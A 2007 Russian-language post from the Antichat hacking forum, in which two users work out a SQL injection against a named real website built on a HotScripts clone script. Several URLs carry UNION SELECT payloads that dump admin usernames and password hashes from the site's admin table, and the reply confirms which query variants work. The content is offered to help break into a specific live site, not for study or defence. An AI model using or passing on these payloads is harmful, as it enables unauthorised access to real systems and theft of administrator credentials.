HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 20.11.2007, 18:34
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами: 10200612

Репутация: 168
По умолчанию
Цитата:
Сообщение от -=lebed=-  
SQL-инъекция в HotScripts Clone Script
Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?
Код:
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*
Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк?
я думаю нет там косяка, просто нету больше админов
1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
count возвращает кол 1

limit and order тоже работают
http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+0,1/*
, такая же история и с "+where+id=1/*"
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.